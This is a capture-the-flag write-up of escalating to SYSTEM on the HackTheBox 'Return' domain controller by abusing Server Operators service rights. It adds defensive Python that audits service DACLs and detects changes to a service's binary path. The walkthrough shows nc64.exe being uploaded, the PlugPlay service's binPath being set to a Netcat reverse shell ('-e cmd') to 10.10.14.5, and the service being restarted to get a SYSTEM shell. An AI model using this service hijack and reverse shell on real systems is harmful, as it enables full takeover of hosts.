Server Operators


While membership of the Server Operators group grants many dangerous privileges to its members, one of the more unique privileges it confers is the ability to modify, stop and start services.

This was initially suspected from the output of the PEAS scan made earlier. PEAS was able to list the ENTIRE table of services present on the target system and mark them as modifiable.

While it essentially means that I can do whatever I want with any service present on the system, I do not want to mess up essential services that the system REQUIRES. Not only is that bad OPSEC, it may even shut the system down completely by accident.

So it requires a bit of caution when working with services.
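From the defender's side, the property PEAS is reporting here is the service DACL: any ACE that grants Server Operators (SDDL trustee `SO`) rights such as SERVICE_CHANGE_CONFIG (`DC`), SERVICE_START (`RP`) or SERVICE_STOP (`WP`) is what makes the service "modifiable". The following Python is an added audit example, not code from this writeup or from PEAS. It parses the SDDL layout that `sc sdshow <service>` prints and lists every principal other than SYSTEM and Administrators that holds change or control rights. The two SDDL strings are constructed for the example: they follow the standard layout, but the Server Operators ACE is modelled on what PEAS flagged rather than copied from the target.

```python
import re

# Service-specific access rights as abbreviated in SDDL. The ones listed here let a
# principal reconfigure or control a service rather than merely query it:
# DC = SERVICE_CHANGE_CONFIG, RP = SERVICE_START, WP = SERVICE_STOP,
# WD = WRITE_DAC, WO = WRITE_OWNER, GA = GENERIC_ALL, GW = GENERIC_WRITE.
RISKY_RIGHTS = {"DC", "RP", "WP", "WD", "WO", "GA", "GW"}

# Subset of well-known SDDL trustee abbreviations, for readable output only.
TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "SO": "BUILTIN\\Server Operators",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE",
    "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone",
}

ACE_RE = re.compile(r"\(([^)]*)\)")


def split_rights(rights):
    """Turn an SDDL rights string into a set of two-letter tokens (hex masks kept whole)."""
    if rights.startswith("0x"):
        return {rights}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def parse_dacl(sddl):
    """Return (ace_type, rights, trustee) for every ACE in the DACL (D:) section."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            continue  # malformed ACE: skip rather than guess
        ace_type, rights, trustee = fields[0], fields[2], fields[5]
        aces.append((ace_type, split_rights(rights), trustee))
    return aces


def audit_service_sddl(service, sddl, trusted=("SY", "BA")):
    """List non-trusted principals holding change/control rights on the service."""
    findings = []
    for ace_type, rights, trustee in parse_dacl(sddl):
        if ace_type != "A" or trustee in trusted:
            continue  # only Allow ACEs grant access; SYSTEM and Administrators are expected
        # A raw hex mask cannot be read token by token, so surface it for manual review.
        risky = sorted(rights & RISKY_RIGHTS) or [r for r in rights if r.startswith("0x")]
        if risky:
            findings.append({
                "service": service,
                "trustee": TRUSTEES.get(trustee, trustee),
                "rights": risky,
            })
    return findings


# Constructed sample modelled on the SDDL layout `sc sdshow <service>` prints; the
# Server Operators (SO) ACE is the point of the exercise, not a copied real default.
PLUGPLAY_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# The same service after trimming Server Operators back to query-only rights.
PLUGPLAY_SDDL_HARDENED = PLUGPLAY_SDDL.replace(
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)", "(A;;CCLCSWLOCRRC;;;SO)"
)

if __name__ == "__main__":
    for label, sddl in (("as found", PLUGPLAY_SDDL), ("hardened", PLUGPLAY_SDDL_HARDENED)):
        findings = audit_service_sddl("PlugPlay", sddl)
        print(f"{label}: {findings or 'no non-trusted principal can reconfigure the service'}")
```

Run over the real output of `sc sdshow` for each service on a DC, this turns PEAS's "modifiable" column into a list of exactly which ACE to trim. The hardened descriptor keeps the query rights (`CC`, `LC`, `SW`, `LO`, `CR`, `RC`) so monitoring tools that run as Server Operators keep working, while removing the ability to change the binary path or bounce the service.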

*evil-winrm* ps c:\tmp> cmd /c sc query PlugPlay
 
service_name: PlugPlay
        type               : 30  WIN32
        state              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        win32_exit_code    : 0  (0x0)
        service_exit_code  : 0  (0x0)
        checkpoint         : 0x0
        wait_hint          : 0x0
*evil-winrm* ps c:\tmp> cmd /c sc qc  PlugPlay
[SC] QueryServiceConfig SUCCESS
 
service_name: PlugPlay
        type               : 20  WIN32_SHARE_PROCESS
        start_type         : 3   DEMAND_START
        error_control      : 1   NORMAL
        binary_path_name   : C:\Windows\system32\svchost.exe -k DcomLaunch -p
        load_order_group   : PlugPlay
        tag                : 0
        display_name       : Plug and Play
        dependencies       :
        service_start_name : LocalSystem

Going through the list, I see a non-essential service: PlugPlay, which allows the system to recognize and adapt to hardware changes. While it is true that messing with the PlugPlay service can result in system instability, as users won't be able to use any physically connected devices, it doesn't matter in the current context. I am conducting the operation remotely and the target system is a DC host, which is NOT supposed to have frequent user interaction, let alone the presence of users. So I will go with this.

To exploit the service, I can change the binPath attribute of the service to point at a malicious binary and restart the service to have it executed. I will use Netcat for that.

*evil-winrm* ps c:\tmp> upload nc64.exe C:\tmp\nc64.exe
info: Uploading nc64.exe to C:\tmp\nc64.exe
 
data: 58260 bytes of 58260 bytes copied
 
info: Upload successful!

Delivery Complete

*evil-winrm* ps c:\tmp> cmd /c sc config PlugPlay binPath='C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd'
[SC] ChangeServiceConfig SUCCESS
 
*evil-winrm* ps c:\tmp> cmd /c sc qc PlugPlay
[SC] QueryServiceConfig SUCCESS
 
service_name: PlugPlay
        type               : 20  WIN32_SHARE_PROCESS
        start_type         : 3   DEMAND_START
        error_control      : 1   NORMAL
        binary_path_name   : C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd
        load_order_group   : PlugPlay
        tag                : 0
        display_name       : Plug and Play
        dependencies       :
        service_start_name : LocalSystem

The binPath attribute of the PlugPlay service has been changed to include a Netcat reverse shell to the Kali host.
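The two `sc qc PlugPlay` dumps above are exactly the evidence a defender wants: the same service, queried before and after, with a changed BINARY_PATH_NAME that now points outside the Windows directory, carries an IP address on its command line, and still runs as LocalSystem. As an added detection example that is not part of this writeup, the Python below parses `sc qc` output, diffs two snapshots, and flags those three properties. The snapshots are constructed from the output quoted on this page, and the trusted-directory list is an assumption for the example rather than a vendor baseline.

```python
import re

# Directories from which a service binary is normally expected to run. This list is
# an assumption for the example; tune it to the host's actual baseline.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Fields whose change between two snapshots is worth an alert.
WATCHED_FIELDS = ("binary_path_name", "service_start_name", "start_type", "type")

IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
FIELD_RE = re.compile(r"^\s*([A-Za-z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Parse one service's `sc qc` output into a dict of lower-cased field -> value."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            cfg[m.group(1).lower()] = m.group(2).strip()
    return cfg


def executable_of(binary_path):
    """Extract the executable from a service command line (quoted or first token)."""
    binary_path = binary_path.strip()
    if binary_path.startswith('"'):
        end = binary_path.find('"', 1)
        return binary_path[1:end] if end > 0 else binary_path[1:]
    # Unquoted: the SCM treats everything up to the first space as the image path.
    return binary_path.split(" ", 1)[0]


def check_service_drift(baseline_text, current_text):
    """Compare two `sc qc` snapshots of one service and return human-readable findings."""
    base, cur = parse_sc_qc(baseline_text), parse_sc_qc(current_text)
    name = cur.get("service_name", "<unknown>")
    findings = []
    for field in WATCHED_FIELDS:
        if base.get(field) != cur.get(field):
            findings.append(
                f"{name}: {field} changed from {base.get(field)!r} to {cur.get(field)!r}"
            )
    binpath = cur.get("binary_path_name", "")
    exe = executable_of(binpath).lower()
    if exe and not exe.startswith(TRUSTED_DIRS):
        findings.append(
            f"{name}: runs {exe!r} outside the trusted directories as "
            f"{cur.get('service_start_name')}"
        )
    ip = IPV4_RE.search(binpath)
    if ip:
        findings.append(f"{name}: binary path carries an IPv4 address ({ip.group(0)})")
    return findings


# Constructed snapshots built from the `sc qc PlugPlay` output quoted in this writeup,
# before and after the binPath change.
BASELINE = r"""
[SC] QueryServiceConfig SUCCESS

service_name: PlugPlay
        type               : 20  WIN32_SHARE_PROCESS
        start_type         : 3   DEMAND_START
        error_control      : 1   NORMAL
        binary_path_name   : C:\Windows\system32\svchost.exe -k DcomLaunch -p
        load_order_group   : PlugPlay
        tag                : 0
        display_name       : Plug and Play
        dependencies       :
        service_start_name : LocalSystem
"""

TAMPERED = BASELINE.replace(
    r"C:\Windows\system32\svchost.exe -k DcomLaunch -p",
    r"C:\tmp\nc64.exe 10.10.14.5 1234 -e cmd",
)

if __name__ == "__main__":
    for label, snap in (("baseline", BASELINE), ("current", TAMPERED)):
        findings = check_service_drift(BASELINE, snap)
        print(f"{label}: {findings or ['no drift']}")
```

Scheduled against a stored baseline of `sc qc` output for every service, this catches the configuration change itself, independent of whether the service was ever restarted. The same ImagePath change also lands in the registry under the service's key, so Sysmon registry-value-set events on `HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath` are the event-driven counterpart to this polling check.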

*evil-winrm* ps c:\tmp> cmd /c sc stop PlugPlay 
 
service_name: PlugPlay
        type               : 20  WIN32_SHARE_PROCESS
        state              : 1  STOPPED
        win32_exit_code    : 0  (0x0)
        service_exit_code  : 0  (0x0)
        checkpoint         : 0x0
        wait_hint          : 0x0
*evil-winrm* ps c:\tmp> cmd /c sc start PlugPlay
[sc] startservice failed 1053:
 
The service did not respond to the start or control request in a timely fashion.

I can then just stop the service and start it again. Notice that it throws an error. That's okay, because Netcat was executed, which is what causes the hang.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ nnc 1234  
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.11.108] 60490
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
 whoami
nt authority\system
 
c:\Windows\system32> hostname
 hostname
printer
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::1a2
   ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   ipv4 address. . . . . . . . . . . : 10.10.11.108
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

Domain Level Compromise